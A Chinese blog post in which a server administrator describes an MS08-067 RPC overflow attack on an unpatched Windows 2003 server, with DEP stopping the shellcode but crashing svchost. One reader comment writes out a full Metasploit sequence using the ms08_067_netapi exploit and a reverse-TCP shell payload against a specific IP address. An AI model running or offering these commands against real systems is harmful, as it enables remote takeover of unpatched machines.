服务器遭MS08-067漏洞攻击

从昨天起服务器频繁出现断网,表现为能ping通但无法连接任何端口,只能通过服务商VPS控制面板硬重启。重启后登陆出现数据执行保护对话框,随后是svchost非法操作关闭对话框(这两个对话框是对管理员重现崩溃时的提示消息)。

事件查看器显示0.01分时出现svchost的Application Error,随后每隔5分钟域控开始记录域控无法连接的错误log。同时安全性日志在0.01分出现来自114.80.83.227的匿名审核。

由于出现过DEP消息,和最近配置域控需要开启RPC联系到一起,推测为RPC溢出攻击,虽然shellcode被DEP机制阻止攻击失败,但服务毕竟免不了一死。Google搜索有关win2003、svchost、断网等关键词,查到MS08-067漏洞,也就是当年黑屏补丁之后爆发的与当年利用RPC的“冲击波”有一拼的“扫荡波”病毒的攻击方式。

看来让win5内核的服务器不打补丁端口全开地裸奔比个人电脑裸奔效果更明显嘛。。。

4 Replies to “服务器遭MS08-067漏洞攻击”

  1. let’s go!
    >msfconsole
    >use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi)>set payload windows/shell/reverse_tcp
    msf exploit(ms08_067_netapi)>set target 1
    msf exploit(ms08_067_netapi)>set rhost 175.102.3.126
    msf exploit(ms08_067_netapi)>set lhost xx.xx.xx.xx
    msf exploit(ms08_067_netapi)set lport 44444

    msf exploit(ms08_067_netapi)exploit
    done!!

Leave a Reply

Your email address will not be published. Required fields are marked *